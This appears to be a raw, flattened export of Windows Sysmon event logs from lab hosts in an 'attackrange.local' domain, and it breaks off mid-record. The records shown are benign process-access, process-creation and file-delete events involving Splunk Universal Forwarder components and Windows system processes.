AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.572{466BC892-F90A-60EB-127E-00000000CF01}74409920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA010BFFADC0471C75CE4550A25281BF,SHA256=B6CE39FB7C02F720C9533C421988F7270124616C6495D72AF9D2B404E6E6AC5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.241{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:51.750{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EA5DD5300FA79C16856741310C766AC,SHA256=C790E2E4DA0CEC767A2F81EA7E378227FDDFFEED2135A3A4D38D891BFC7F6F92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.793{466BC892-F90B-60EB-147E-00000000CF01}86488900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.489{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBC2FF0EBE35249D43CEDA6E529C2114,SHA256=43D1FC5EF02F0EF7AA2A8AAFE4579971C3F6AC8DD287D3490F72A8ACE1675E04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.420{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.257{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A17F131E477E34E8B428A9A744AB804,SHA256=A2398C268027DBDE23301694485B028EFEE9C7281556A055AB0E6FBBC92259A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.257{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C91343BCA0652712331093A64254542C,SHA256=7AD834BD2CC7F4765C1203DC5D03081339C8B1B83F9A34D38F7F4967D82EA37D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:52.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE94BF493D83E4F928E7C3E47855E66,SHA256=55764AD3BF52B210C6B04C608C3E2711FE825B2AEF1E6C8AA665825B98DFACAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:52.961{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 